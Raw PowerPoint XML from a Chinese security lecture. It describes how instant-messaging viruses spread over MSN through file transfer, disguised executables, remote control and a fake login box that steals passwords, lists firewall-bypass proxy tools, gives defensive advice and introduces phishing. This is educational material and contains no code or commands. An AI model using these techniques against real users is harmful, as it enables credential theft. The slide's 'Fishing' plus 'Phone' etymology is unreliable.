              <a:t>的“文件发送”按钮发送“点击”命令，将病毒文件传送给正在聊天的伙伴</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="-윤고딕120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>微软提供了的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MSN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的程序开发接口，允许程序开发人员在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MSN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>上进行开发</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病毒制造者编写利用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>MSN</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>的文件传送功能进行传播的病毒</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8194" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1691005"/>
            <a:ext cx="9677400" cy="4546600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>WScript.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>使得脚本可以被执行，就象执行批处理一样</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="-윤고딕120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"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在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>WSH</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>脚本环境里，预定义了一些对象，通过这些内置对象，可以实现获取环境变量、创建快捷方式、加载程序、读写注册表等功能</a:t>
            </a:r>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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>即时通讯病毒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52226" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>即时通讯软件绕过防火墙的方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>ICQProxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>SocksCap32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>HTTPPort</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>Socks2HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>－</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>BorderClient</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>FileGateway</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>即时通讯病毒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54274" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MSN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>附件进行传播</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54275" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3648075" y="2133600"/>
            <a:ext cx="4464050" cy="4130675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>即时通讯病毒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56322" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过伪装方式进行传播</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病毒是一个可执行程序，采用了图片文件的图标</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当用户打开这个“图片”时，病毒被释放</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56323" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3575050" y="3213100"/>
            <a:ext cx="4365625" cy="2376488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>即时通讯病毒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58370" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" i="1" dirty="0"/>
              <a:t>利用远程控制方式传播</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" i="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>中毒的计算机自动登录到</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" i="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>MSN</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" i="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>服务器上，并注册成为攻击者</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" i="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>MSN Messenger</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" i="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>的好友之一</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" i="1" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="-윤고딕120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" i="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>病毒利用的是底层协议，用户即使不安装</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" i="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>MSN Messenger</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" i="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>，也可能被病毒感染</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" i="1" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="-윤고딕120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" i="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>黑客们常常把这些病毒与流行软件、网络游戏外挂程序等捆绑在一起，供人们下载使其中毒</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" i="1" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="-윤고딕120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" i="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>成功侵入用户的电脑之后，会把其设置成为一台网络服务器。攻击者只要在浏览器里输入这台电脑的网络地址，就会弹出控制页面</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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>即时通讯病毒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59394" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>伪装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MSN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>登录框窃取密码</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运行时会弹出一个仿制的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>MSN</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>登录框，用户用自己的密码登录</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>MSN</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>，该程序会给出出错信息并自动退出</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用户的密码信息以文本文档的形式记录在用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>盘中，伺机发送给病毒制造者</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59395" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3863975" y="4005263"/>
            <a:ext cx="3960813" cy="2222500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>即时通讯病毒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60418" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>防范即时通讯病毒的安全建议</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尽量不要在公共场合使用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>IM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>软件</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随时注意微软公司官方的安全公告，及时下载更新系统漏洞补丁</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对发送文件提高警惕</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建议使用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>位以上的复杂密码</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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络钓鱼</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61442" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络钓鱼（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Phishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）一词是“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Fishing”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Phone”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的结合体</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络钓鱼从根本上来讲是一种欺诈行为，或者说是利用互联网实施的网络诈骗</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用欺骗性的电子邮件和伪造的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>站点</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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络钓鱼</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62466" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>诈骗者通常会将自己伪装成知名银行、网上商城或信用卡公司等正规公司和信誉度较高的知名品牌以博得用户的信任</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>受骗者往往会泄露自己的个人数据，如信用卡号、账户、密码、社保编号等内容</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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络钓鱼</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63490" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
